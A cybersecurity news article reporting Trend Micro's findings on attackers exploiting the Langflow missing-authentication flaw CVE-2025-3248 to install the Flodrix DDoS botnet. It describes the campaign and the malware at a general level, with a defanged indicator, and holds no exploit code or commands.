Cybersecurity researchers have identified a new campaign exploiting a critical security flaw in Langflow to distribute the Flodrix botnet malware.
According to a technical report by Trend Micro researchers Aliakbar Zahravi, Ahmed Mohamed Ibrahim, Sunil Bharti, and Shubham Singh, attackers are leveraging the vulnerability to deploy downloader scripts on compromised Langflow servers, leading to the installation of the Flodrix malware.
The flaw in question is CVE-2025-3248 (CVSS score: 9.8), a missing authentication vulnerability in Langflow, a Python-based “visual framework” for creating artificial intelligence (AI) applications.
The exploitation of this vulnerability can allow unauthenticated attackers to run arbitrary code through crafted HTTP requests. Langflow patched this vulnerability in March 2025 with version 1.3.0.
Recently, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned about active exploitation of CVE-2025-3248 in the wild, with the SANS Technology Institute reporting exploit attempts on its honeypot servers.
Trend Micro’s latest report reveals that threat actors are targeting unpatched Langflow instances exposed on the internet, using a publicly available proof-of-concept (PoC) code to conduct reconnaissance and deploy a shell script downloader to fetch and execute the Flodrix botnet malware from “80.66.75[.]121:25565.”
Once Flodrix is installed, it establishes communication with a remote server to receive commands over TCP for launching distributed denial-of-service (DDoS) attacks on specific target IP addresses. The botnet also supports connections over the TOR anonymity network.
The researchers noted that due to the lack of input validation or sandboxing in Langflow, these payloads are executed within the server’s context, potentially leading to remote code execution. This allows attackers to profile vulnerable servers and identify high-value targets for future attacks.
Trend Micro’s investigation revealed that unknown threat actors are hosting various downloader scripts on the same host used to fetch Flodrix, indicating ongoing development of the campaign.
Flodrix is considered an evolution of the LeetHozer botnet associated with the Moobot group. This enhanced variant can self-remove, reduce forensic traces, and complicate analysis efforts by obfuscating command-and-control (C2) server addresses and other crucial indicators.
Trend Micro highlighted that the new Flodrix sample introduces encrypted DDoS attack types for added obfuscation and enumerates running processes by accessing all running processes in the /proc directory.
